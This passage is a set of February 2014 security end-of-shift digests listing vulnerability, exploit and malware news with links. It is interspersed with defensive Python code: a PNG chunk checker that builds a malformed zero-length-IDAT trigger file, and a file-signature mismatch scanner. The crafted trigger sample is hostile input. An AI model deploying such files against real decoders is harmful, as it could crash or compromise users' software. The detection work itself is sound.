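        (crc,) = struct.unpack(">I", data[end:end + 4])
        # The CRC covers the type field and the payload, not the length field.
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC on chunk %r" % ctype)
        yield ctype, payload
        pos = end + 4
        if ctype == b"IEND":
            return
    raise ValueError("missing IEND chunk")


def zero_length_idat_positions(data):
    """Return the indices (in chunk order) of every IDAT chunk with length 0."""
    return [i for i, (ctype, payload) in enumerate(iter_chunks(data))
            if ctype == b"IDAT" and len(payload) == 0]


def is_safe_for_progressive_decoder(data):
    """True if the file parses cleanly and contains no zero-length IDAT chunk."""
    try:
        return not zero_length_idat_positions(data)
    except ValueError:
        return False


# --- constructed sample files -------------------------------------------

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png(idat_payloads):
    """Build a minimal 1x1 8-bit grayscale PNG carrying the given IDAT payloads."""
    # width, height, bit depth, colour type, compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    body = b"".join(_chunk(b"IDAT", p) for p in idat_payloads)
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + body + _chunk(b"IEND", b"")


# One scanline of a 1x1 image: filter byte 0 followed by one grey sample.
GOOD_PNG = make_png([zlib.compress(b"\x00\x00")])
# Same image, but preceded by an empty IDAT chunk (the trigger VU#684412 describes).
BAD_PNG = make_png([b"", zlib.compress(b"\x00\x00")])

if __name__ == "__main__":
    for name, blob in (("good", GOOD_PNG), ("bad", BAD_PNG)):
        print(name, zero_length_idat_positions(blob),
              is_safe_for_progressive_decoder(blob))
```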
*** Schneider Electric SCADA Products Exception Handler Vulnerability ***
---------------------------------------------
Researcher Carsten Eiram of Risk Based Security has identified an exception handling vulnerability in Schneider Electric’s CitectSCADA application. The original vulnerability reported by Mr. Eiram had already been fixed in CitectSCADA v7.20SP2. While investigating this vulnerability report, Schneider Electric discovered additional related vulnerabilities and has produced a patch that mitigates them in SCADA Expert Vijeo Citect, CitectSCADA, and PowerSCADA Expert.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-350-01
*** IBM AIX OpenSSL Multiple Denial of Service Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57041
*** Python Buffer Overflow in socket.recvfrom_into() Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029831
*** Cisco Unified Communications Manager CAPF Unauthenticated Device Information Update Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Unified Communications Manager OS Administration CSRF Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Unified Contact Center Express CCMConfig Sensitive Information Disclosure Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Unified Contact Center Express Serviceability Page CSRF Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 24-02-2014 18:00 − Tuesday 25-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Android users under attack through malicious ads in Facebook ***
---------------------------------------------
Cyber-criminals are always trying to attract people's attention in order to carry out their crimes. So it should be no surprise that they have now found a combined way of using Facebook (the world's largest social network), WhatsApp (the leading text messaging program for smartphones, recently bought by Facebook) and Android (the most popular operating...
---------------------------------------------
http://pandalabs.pandasecurity.com/android-users-under-attack-through-malic…
*** New attack completely bypasses Microsoft zero-day protection app ***
---------------------------------------------
Whitehats' ability to sidestep EMET strongly suggests criminal hackers can, too.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/aCb9-4Ke6D8/
*** Poisoned YouTube ads serve Caphaw banking trojan ***
---------------------------------------------
YouTube's ad network was compromised to host the Styx exploit kit, researchers found.
---------------------------------------------
http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/…
*** Blog: The first Tor Trojan for Android ***
---------------------------------------------
Virus writers of Android Trojans have traditionally used Windows malware functionality as a template. Now, yet another technique from Windows Trojans has been implemented in malware for Android: for the first time we have detected an Android Trojan that uses a domain in the .onion pseudo zone as a C&C. The Trojan uses the anonymous Tor network built on a network of proxy servers. As well as providing users with anonymity,...
---------------------------------------------
http://www.securelist.com/en/blog/8184/The_first_Tor_Trojan_for_Android
*** Touchlogger: iOS as an eavesdropping device ***
---------------------------------------------
The security experts at Fireeye Labs have developed an iOS app that can record all input on the touchscreen in the background and transmit it to a server.
---------------------------------------------
http://www.golem.de/news/touchlogger-ios-im-lauscheinsatz-1402-104776-rss.h…
*** The Tenth Anniversary of Mobile Malware ***
---------------------------------------------
2014 marks the tenth anniversary of mobile malware. It all began in 2004, when the first variant of SymbOS.Cabir was submitted to security researchers. The analysis revealed that this worm targeted Symbian OS, which was a very popular mobile operating system at the time. Infected phones would search for nearby Bluetooth devices that...
---------------------------------------------
http://www.symantec.com/connect/blogs/tenth-anniversary-mobile-malware
*** Best Practices in Computer Network Defense ***
---------------------------------------------
This article was published in the book Computer Network Defense: Incident Detection and Response, edited by Melissa E. Hathaway, NATO Science for Peace and Security Series, 2014. The article is about the Dutch approach, the importance of international cooperation and the role of the Dutch Cyber Security Council.
---------------------------------------------
http://www.ncsc.nl/english/current-topics/news/best-practices-in-computer-n…
*** "goto fail": demo exploit for SSL vulnerability in iOS and OS X ***
---------------------------------------------
Security researcher Aldo Cortesi has adapted his tool mitmproxy to capture the encrypted traffic of unpatched iOS devices and Macs running OS X 10.9 Mavericks. Almost everything can be read, according to Cortesi.
---------------------------------------------
http://www.heise.de/security/meldung/goto-fail-Demo-Exploit-fuer-SSL-Schwac…
*** HPSBST02937 rev.1 - HP StoreVirtual 4000 and StoreVirtual VSA Software dbd_manager, Remote Execution of Arbitrary Code ***
---------------------------------------------
A potential security vulnerability has been identified with HP StoreVirtual 4000 and StoreVirtual VSA Software (formerly known as HP LeftHand Virtual SAN Appliance) dbd_manager. The vulnerability could be remotely exploited resulting in execution of arbitrary code.
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** HPSBMU02971 rev.1 - HP Application Information Optimizer, Remote Execution of Code, Information Disclosure ***
---------------------------------------------
A potential security vulnerability has been identified in the Web Console component of HP Application Information Optimizer (formerly HP Database Archiving). The vulnerability could be exploited to allow remote execution of code and information disclosure.
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** Bugtraq: WiFiles HD v1.3 iOS - File Include Web Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531236
*** MYBB 1.6.12 search.php Sql injection ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020202
*** GitHub RCE by Environment variable injection Bug Bounty ***
---------------------------------------------
Topic: GitHub RCE by Environment variable injection Bug Bounty Risk: High Text: GitHub RCE by Environment variable injection Bug Bounty writeup Disclaimer: I'll keep this really short but I hope you'll g...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020209
*** TYPO3 6.1.7 XSS / Disclosure / Shell Upload ***
---------------------------------------------
Topic: TYPO3 6.1.7 XSS / Disclosure / Shell Upload Risk: High Text:# == # Title ...| Multiple vulnerabilities in Typo3 CMS # Version .| introductionpackage-6.1.7 # Date .....
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020208
*** FreePBX 2.x Remote Command Execution ***
---------------------------------------------
Topic: FreePBX 2.x Remote Command Execution Risk: High Text: App : Freepbx 2.x Download : schmoozecom.net Author : i-Hmx Mail : n0p1337(a)gmail.com Home : security arrays inc. , sec4ever...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020206
*** Zen Cart E-Commerce 1.5.1 Multiple vulnerabilities ***
---------------------------------------------
Topic: Zen Cart E-Commerce 1.5.1 Multiple vulnerabilities Risk: High Text:# == # Title ...| Multiple vulnerabilities in Zen Cart e-commerce # Version .| zen-cart-v1.5.1-full-file...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020203
*** WordPress Search Everything Plugin SQL Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56820
*** AutoCAD Insecure Library and FAS File Loading Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57002
*** OATH Toolkit libpam-oath replay ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/91316
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 21-02-2014 18:00 − Monday 24-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Researchers Develop Complete Microsoft EMET Bypass ***
---------------------------------------------
Researchers at Bromium Labs are expected to deliver a paper today that explains how they were able to bypass all of the memory protection mitigations in Microsoft's Enhanced Mitigation Experience Toolkit.
---------------------------------------------
http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/10…
*** Apples SSL/TLS bug (22 Feb 2014) ***
---------------------------------------------
Yesterday, Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details. Since the answer is at the top of the Hacker News thread, I guess the cat's out of the bag already and we're into the misinformation-quashing stage now.
---------------------------------------------
https://www.imperialviolet.org/2014/02/22/applebug.html
*** An In-depth Analysis of Linux/Ebury ***
---------------------------------------------
ESET has been analyzing and tracking an OpenSSH backdoor and credential stealer named Linux/Ebury. The result of this work on the Linux/Ebury malware family is part of a joint research effort with CERT‑Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations forming an international Working Group.
---------------------------------------------
http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
*** Microsoft Windows Crash Reports Reveal New APT, POS Attacks ***
---------------------------------------------
You never know what you'll glean from a Windows crash report: security researchers recently unearthed a previously unknown advanced persistent threat campaign as well as a new point-of-sale system attack by perusing and analyzing those crash reports, also known as Dr. Watson.
---------------------------------------------
http://www.darkreading.com/attacks-breaches/microsoft-windows-crash-reports…
*** NIST Unveils Crypto Standards Proposal ***
---------------------------------------------
Because of concerns of possible National Security Agency meddling with its cryptographic standards, the National Institute of Standards and Technology has issued a draft report proposing revisions in how it develops cryptographic standards.
---------------------------------------------
http://www.govinfosecurity.com/nist-unveils-crypto-standards-proposal-a-6519
*** Free access to remote controls for industrial plants ***
---------------------------------------------
A project at FU Berlin documents that thousands of industrial plants worldwide are reachable over the Internet but only insufficiently protected. The result is an interactive map on which potentially attackable plants are marked.
---------------------------------------------
http://www.heise.de/security/meldung/Freier-Zugriff-auf-Fernsteuerungen-fue…
*** Security vulnerabilities found in 80% of best-selling SOHO wireless routers ***
---------------------------------------------
Tripwire has analyzed the security provided by the most popular wireless routers used in many small and home offices and found that 80 percent of Amazon's top 25 best-selling SOHO wireless router models have security vulnerabilities.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16399
*** eGroupWare Multiple PHP Object Injection Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57047
*** JBoss RichFaces Malformed Push Request Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57053
*** Barracuda Firewall Exception Handling Cross Site Scripting ***
---------------------------------------------
Topic: Barracuda Firewall Exception Handling Cross Site Scripting Risk: Low Text:Document Title: Barracuda Bug Bounty #36 Firewall - Client Side Exception Handling Web Vulnerability References ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020186
*** DSA-2866 gnutls26 ***
---------------------------------------------
certificate verification flaw
---------------------------------------------
http://www.debian.org/security/2014/dsa-2866
*** ICONICS GENESIS32 Insecure ActiveX Control ***
---------------------------------------------
NCCIC/ICS-CERT discovered a vulnerability in the ICONICS GENESIS32 application during resolution of unrelated products. ICONICS has produced a patch for all vulnerable versions of its GENESIS32 product. ICONICS GENESIS32 Version 9.0 and newer are not vulnerable to this ActiveX vulnerability.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-14-051-01
*** HPSBMU02964 rev.1 - HP Service Manager, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access, Disclosure of Information and Authentication Issues ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Service Manager. The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Denial of Service (DoS), execution of arbitrary code, unauthorized access, disclosure of Information, and authentication issues.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** ASUS router drive-by code execution via XSS and authentication bypass ***
---------------------------------------------
Several ASUS routers include reflected Cross-Site Scripting (CWE-79) and authentication bypass (CWE-592) vulnerabilities. An attacker who can lure a victim to browse to a web site containing a specially crafted JavaScript payload can execute arbitrary commands on the router as administrator (root). No user interaction is required.
---------------------------------------------
https://sintonen.fi/advisories/asus-router-auth-bypass.txt
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 20-02-2014 18:00 − Friday 21-02-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Adobe Flash: zero-day exploit actively exploited ***
---------------------------------------------
Adobe has again released a security patch for Flash Player this month. It should be installed as quickly as possible. Attacks on Flash Player are currently under way in which a security hole is being actively exploited. (Adobe, Server)
---------------------------------------------
http://www.golem.de/news/adobe-flash-zero-day-exploit-wird-aktiv-ausgenutzt…
http://blogs.adobe.com/psirt/?p=1059
http://helpx.adobe.com/security/products/flash-player/apsb14-07.html
*** Security update for the free database PostgreSQL ***
---------------------------------------------
The developers close several security holes that allowed users to change their privileges. They also warn of a not yet fixed bug that allows a system account to be hijacked.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsupdate-fuer-freie-Datenbank…
http://www.postgresql.org/about/news/1506/
*** Spamvertised "You received a new message from Skype voicemail service" themed emails lead to Angler exploit kit ***
---------------------------------------------
We've just intercepted a currently circulating malicious spam campaign that's attempting to trick potential botnet victims into thinking that they've received a legitimate Voice Message Notification from Skype. In reality though, once socially engineered users click on the malicious link found in the bogus emails, they're automatically exposed to the client-side exploits served by the Angler exploit kit.
---------------------------------------------
http://www.webroot.com/blog/2014/02/20/spamvertised-received-new-message-sk…
*** Ransomware Trojan Bitcrypt cracked ***
---------------------------------------------
The ransomware Trojan Bitcrypt encrypts the user's files and only hands the data back against payment of a ransom. Security experts, however, succeeded in cracking the encryption.
---------------------------------------------
http://www.heise.de/security/meldung/Erpressungs-Trojaner-Bitcrypt-geknackt…
*** Google Fixes 28 Security Flaws in Chrome 33 ***
---------------------------------------------
Google Chrome 33 is out, and the new version of the browser includes fixes for 28 security vulnerabilities, including a number of high-severity bugs. The company paid out more than $13,000 in rewards to researchers who reported vulnerabilities that were fixed in this release.
---------------------------------------------
https://threatpost.com/google-fixes-28-security-flaws-in-chrome-33/104391
*** HP Service Manager Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Conduct Cross-Site Scripting and Cross-Site Request Forgery Attacks ***
---------------------------------------------
CVE Reference: CVE-2013-6202
Date: Feb 21 2014
Impact: Denial of service via network, Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
---------------------------------------------
http://www.securitytracker.com/id/1029803
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** AdRotate 3.9.4 SQL Injection ***
---------------------------------------------
Topic: AdRotate 3.9.4 SQL Injection Risk: Medium Text:Advisory ID: HTB23201 Product: AdRotate Vendor: AJdG Solutions Vulnerable Version(s): 3.9.4 and probably prior Tested Versi...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020178
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 19-02-2014 18:00 − Thursday 20-02-2014 18:00
Handler: Alexander Riepl
Co-Handler: Christian Wojner
*** Malicious iFrame Injections Host Payload on Tumblr ***
---------------------------------------------
It's always fun to watch malware developers using different techniques to code their creations. Sometimes it's a matter of obfuscation, placement, injection, but this time it's how they code it to be dynamic. I believe this is not the first one that uses this service, but it's the first time I'm seeing ..
---------------------------------------------
http://blog.sucuri.net/2014/02/malicious-iframe-injections-host-payload-on-…
*** Health Care Systems Poorly Protected, Many Already Compromised ***
---------------------------------------------
New report shows that health care industry intellectual property, payment information, and patient data are poorly protected and, in many cases, already compromised.
---------------------------------------------
http://threatpost.com/health-care-systems-poorly-protected-many-already-com…
*** Microsoft release FixIt for IE9/IE10 Zero Day, (Thu, Feb 20th) ***
---------------------------------------------
Microsoft has published a TechNet article detailing the availability of a "FixIt" for the current IE9/IE10 zero day which has been doing the rounds. Corporate users will presumably have to wait until the availability of the patch which Microsoft say will be released during the monthly patching cycle..
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17684&rss
*** Microsoft Security Advisory (2934088) ***
---------------------------------------------
Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 10. Only Internet Explorer 9 and Internet Explorer 10 are affected by this vulnerability. Other supported versions of Internet Explorer are not affected. Applying the Microsoft Fix it solution, "MSHTML Shim Workaround," prevents ..
---------------------------------------------
https://technet.microsoft.com/en-us/security/advisory/2934088
*** Fritzbox hole: now also in WLAN repeaters ***
---------------------------------------------
On the routers, by no means all users have closed the security hole yet, but at least firmware updates are available. Now AVM is also fixing the software of other products with a WLAN interface.
---------------------------------------------
http://www.heise.de/security/meldung/Fritzbox-Luecke-Jetzt-auch-bei-WLAN-Re…
*** Database leak in Leoben, hack attack on Energie Steiermark ***
---------------------------------------------
A connection between the two incidents is possible - access to gas customer data at Energie Steiermark
---------------------------------------------
http://derstandard.at/1392685633659
*** eXtplorer Joomla! Authentication Bypass Security Issue ***
---------------------------------------------
https://secunia.com/advisories/57022
*** SA-CONTRIB-2014-022 - Slickgrid - Access bypass ***
---------------------------------------------
The module doesn't check access sufficiently, allowing users to ..
---------------------------------------------
https://drupal.org/node/2200491
*** Drupal Maestro 7.x Cross Site Scripting ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020165
*** [remote] - MediaWiki Thumb.php Remote Command Execution ***
---------------------------------------------
http://www.exploit-db.com/exploits/31767
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 18-02-2014 18:00 − Wednesday 19-02-2014 18:00
Handler: Alexander Riepl
Co-Handler: Christian Wojner
*** Time to Harden Your Hardware? ***
---------------------------------------------
Most Internet users are familiar with the concept of updating software that resides on their computers. But this past week has seen alerts about an unusual number of vulnerabilities and attacks against some important and ubiquitous hardware devices, from consumer-grade Internet routers, data storage and home automation products to enterprise-class security solutions.
---------------------------------------------
http://krebsonsecurity.com/2014/02/time-to-harden-your-hardware/
*** 2013 DataBreach Report By Risk Based Security ***
---------------------------------------------
Today Riskbasedsecurity.com has announced a report that covers the 2013 period for data breaches of all kinds.
---------------------------------------------
http://www.cyberwarnews.info/2014/02/19/2013-databreach-report-by-risk-base…
*** Let's Talk About Your Security Breach with Metasploit. Literally. In Real Time. ***
---------------------------------------------
During a recent business trip in Boston, Tod and I sat down in a bar with the rest of the Metasploit team, and shared our own random alcohol-driven ideas on Metasploit hacking. At one point we started talking about hacking webcams. At that time Metasploit could only list webcams, take a snapshot, stream (without sound), or record audio using a meterpreter...
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/02/18/lets-talk…
*** 300,000 Usernames, Passwords Posted to Pastebin ***
---------------------------------------------
More than 300,000 credentials were posted on the clipboard website Pastebin.com in the year 2013 alone according to a recent analysis by a Swiss security firm.
---------------------------------------------
http://threatpost.com/300000-usernames-passwords-posted-to-pastebin/104333
*** Smartphones and tablets: exploit code for 14-month-old Android security hole ***
---------------------------------------------
Exploit code for the Metasploit framework has been published for a security hole in Android that has been known for 14 months. A security researcher criticises that most Android devices in circulation have the security hole.
---------------------------------------------
http://www.golem.de/news/smartphones-und-tablets-exploit-code-fuer-14-monat…
*** Detected new Zeus variant which makes use of steganography ***
---------------------------------------------
Security experts at Malwarebytes detected a new variant of the popular Zeus banking trojan which makes use of steganography to hide the configuration file.
---------------------------------------------
http://securityaffairs.co/wordpress/22334/malware/zeus-banking-malware-nest…
*** Hack against AVM routers: AVM publishes list of affected Fritzboxes ***
---------------------------------------------
After much back and forth, AVM has now published a list of all Fritzboxes that documents their exact security status. For two of the affected devices no update is available yet, and some questions remain open.
---------------------------------------------
http://www.heise.de/security/meldung/Hack-gegen-AVM-Router-AVM-veroeffentli…
*** Admin rights key to mitigating vulnerabilities, study shows ***
---------------------------------------------
It's been best practice for a very long time: all users and processes should run with the fewest privileges necessary. This limits the damage that can be done by an attacker if the user or process is compromised.
---------------------------------------------
http://www.zdnet.com/admin-rights-key-to-mitigating-vulnerabilities-study-s…
*** Second Group Seen Using IE 10 Zero Day ***
---------------------------------------------
There are at least two different groups running attacks exploiting the recently published zero day vulnerability in Internet Explorer 10, and researchers say one of the groups used the bug to impersonate a French aerospace manufacturer and compromise victims visiting the spoofed Web page. The attackers also used a special feature of ..
---------------------------------------------
http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344
*** Security Bulletins: SSL Certificate Validation Vulnerability in the Citrix ShareFile Mobile Application for Android and the Citrix ShareFile Mobile for Tablets Application for Android ***
---------------------------------------------
http://support.citrix.com/article/CTX140303
*** MediaWiki Thumb.php Remote Command Execution ***
---------------------------------------------
Topic: MediaWiki Thumb.php Remote Command Execution
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020153
*** Ruby on Rails Multiple Vulnerabilities ***
---------------------------------------------
Ruby on Rails Multiple Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/56964
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 17-02-2014 18:00 − Tuesday 18-02-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Wait a minute... that's not a real JPG! ***
---------------------------------------------
When attackers compromise a website and want to harvest credit cards, they need to either find where the data is stored or capture the data in transit. This blog post shows how identifying files with false file signatures can uncover malicious activity on a server. I recently discovered credit card data hidden behind a .jpg extension that led me to the work of an attacker capturing credit cards from customers using an online checkout page.
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/3m5-LV3n59k/wait-a-min…
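The check the post describes, as an added example that is not the SpiderLabs author's tooling: compare each file's leading bytes (its signature) with the format its extension claims, and report the ones that disagree; the sample files, including the "JPEG" that is really a text dump, are constructed in the block.

```python
"""Find files whose leading bytes contradict the extension they carry.

Added example, not the SpiderLabs post's own tooling: data parked behind a
.jpg name relies on nobody checking the content. Compare the file signature
(magic bytes) with what the extension promises and report the mismatches.
The sample files scanned by demo_scan() are constructed here.
"""
import os
import tempfile
from pathlib import Path

# Magic bytes of formats a web server commonly serves as images.
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXTENSION_FORMAT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
HEAD_BYTES = 16  # enough to cover every signature above


def detect_format(head):
    """Return the format whose signature matches the leading bytes, else None."""
    for fmt, sigs in SIGNATURES.items():
        if any(head.startswith(s) for s in sigs):
            return fmt
    return None


def looks_like_text(head):
    """Printable ASCII plus whitespace only: typical of dumped records or scripts, not image data."""
    return bool(head) and all(32 <= b < 127 or b in b"\r\n\t" for b in head)


def check_signature(name, head):
    """Return None when content and extension agree, else (expected, actual)."""
    ext = Path(name).suffix.lower().lstrip(".")
    expected = EXTENSION_FORMAT.get(ext)
    if expected is None:
        return None          # no signature known for this extension; not judged
    detected = detect_format(head)
    if detected == expected:
        return None
    if detected:
        actual = detected    # a real image, just not the one the name claims
    elif looks_like_text(head):
        actual = "text"
    else:
        actual = "unknown binary"
    return expected, actual


def scan_tree(root):
    """Walk root and return sorted (relative path, expected, actual) for each mismatch."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                head = fh.read(HEAD_BYTES)
            result = check_signature(path, head)
            if result:
                findings.append((os.path.relpath(path, root),) + result)
    return sorted(findings)


# Constructed samples: a genuine JFIF header, and a "JPEG" that is really a record dump.
REAL_JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01"
FAKE_JPEG_HEAD = b"customer=alice;card=XXXX-XXXX-XXXX-1111;exp=12/16\n"


def demo_scan():
    """Write the constructed samples into a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        images = Path(tmp, "images")
        images.mkdir()
        (images / "logo.jpg").write_bytes(REAL_JPEG_HEAD)
        (images / "cache.jpg").write_bytes(FAKE_JPEG_HEAD)
        (images / "banner.png").write_bytes(SIGNATURES["png"][0] + b"\x00" * 8)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, expected, actual in demo_scan():
        print("%s: extension says %s, content is %s" % (rel, expected, actual))
```

Point scan_tree() at a web root to apply the same check to real uploads; only extensions listed in EXTENSION_FORMAT are judged, so add signatures there before extending it to other types.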
*** [2014-02-18] Critical vulnerabilities in Symantec Endpoint Protection ***
---------------------------------------------
Attackers are able to completely compromise the Symantec Endpoint Protection Manager server, as they can gain access at the system and database level because of critical XXE and SQL injection vulnerabilities. Furthermore, attackers can manage all endpoints and possibly deploy attacker-controlled code on clients.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Scanning for Symantec Endpoint Manager, (Mon, Feb 17th) ***
---------------------------------------------
Last week, we mentioned a new vulnerability in Symantec Endpoint Protection Management. According to Symantec's advisory, this product listens on ports 9090 and 8443/TCP. Both ports are scanned regularly for various vulnerabilities, in particular 8443, being that it is frequently used by web servers as an alternative to 443. However, on February 7th, we detected a notable increase in scans for both ports.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17657&rss
*** GE Proficy Vulnerabilities ***
---------------------------------------------
OVERVIEW Researchers amisto0x07 and Z0mb1E of Zero Day Initiative (ZDI) have identified two vulnerabilities in the General Electric (GE) Proficy human-machine interface/supervisory control and data acquisition (HMI/SCADA) - CIMPLICITY application. GE has released security advisories, GEIP13-05 and GEIP13-06, to inform customers about these vulnerabilities. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01
*** PHP Backdoors: Hidden With Clever Use of Extract Function ***
---------------------------------------------
When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor.
---------------------------------------------
http://feedproxy.google.com/~r/sucuri/blog/~3/kPCRBZwe1mQ/php-backdoors-hid…
*** A journey to CVE-2014-0497 exploit ***
---------------------------------------------
Last week we published a blog post about a CVE-2013-5330 exploit. We've also recently seen a new, similar attack targeting a patched Adobe Flash Player vulnerability (CVE-2014-0497). The vulnerability related to this malware was addressed with a patch released by Adobe on February 4, 2014. Flash Player versions 12.0.0.43 and earlier are vulnerable. We analyzed how these attacks work and found the following details.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-04…
*** WordPress two-factor login plugin bug, er, bypasses 2-factor login ***
---------------------------------------------
Cross-site vulnerability exposes bloggers
The maker of a popular plugin that provides two-factor authentication for WordPress bloggers is preparing an update - after finding a vulnerability in its system. It advises that anyone using two-factor plugins from any vendor needs to check their security strength.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/02/18/wordpress_2…
*** VU#656302: Belkin Wemo Home Automation devices contain multiple vulnerabilities ***
---------------------------------------------
Vulnerability Note VU#656302 Belkin Wemo Home Automation devices contain multiple vulnerabilities. Original Release date: 18 Feb 2014 | Last revised: 18 Feb 2014
Overview: Belkin Wemo Home Automation devices contain multiple vulnerabilities.
Description: CWE-321: Use of Hard-coded Cryptographic Key - CVE-2013-6952. Belkin Wemo Home Automation firmware contains a hard-coded cryptographic key and password. An attacker may be able to extract the key and password to sign a malicious firmware
---------------------------------------------
http://www.kb.cert.org/vuls/id/656302
*** SSA-892342 (Last Update 2014-02-18): Denial-of-Service Vulnerability in RuggedCom ROS-based Devices ***
---------------------------------------------
Summary: A potential vulnerability might allow attackers to perform a Denial-of-Service attack over the network without authentication on RuggedCom products running ROS. RuggedCom and Siemens address this issue by a firmware update.
AFFECTED PRODUCTS
All RuggedCom ROS-based devices with:
All ROS versions before 3.11
ROS 3.11 (for RS950G): all versions
ROS 3.12: all versions < ROS v3.12.4
ROS 4.0 (for RSG2488)
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Exploit Released for Vulnerability Targeted By Linksys Router Worm ***
---------------------------------------------
Technical details about a vulnerability in Linksys routers that's being exploited by a new worm were released on Sunday along with a proof-of-concept exploit and a larger than earlier expected list of potentially vulnerable device models.
---------------------------------------------
http://www.cio.com/article/748352/Exploit_Released_for_Vulnerability_Target…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 14-02-2014 18:00 − Monday 17-02-2014 18:00
Handler: Alexander Riepl
Co-Handler: Christian Wojner
*** Not Just Pills or Payday Loans, It's Essay SEO SPAM! ***
---------------------------------------------
Remember back in school or college when you had to write pages and pages of long essays, but you had no time to write them? Or maybe you were just too lazy? Yeah, good times. Well, it seems like some companies are trying to end this problem. They are offering services where clients pay ..
---------------------------------------------
http://blog.sucuri.net/2014/02/not-just-pills-or-payday-loans-its-essay-seo…
*** New IE 10 Zero Day Targeting Military Intelligence ***
---------------------------------------------
A new campaign, dubbed Operation SnowMan, has been spotted leveraging a previously unknown zero-day in Internet Explorer 10 to compromise the U.S. Veterans of Foreign Wars website this week.
---------------------------------------------
http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/10…
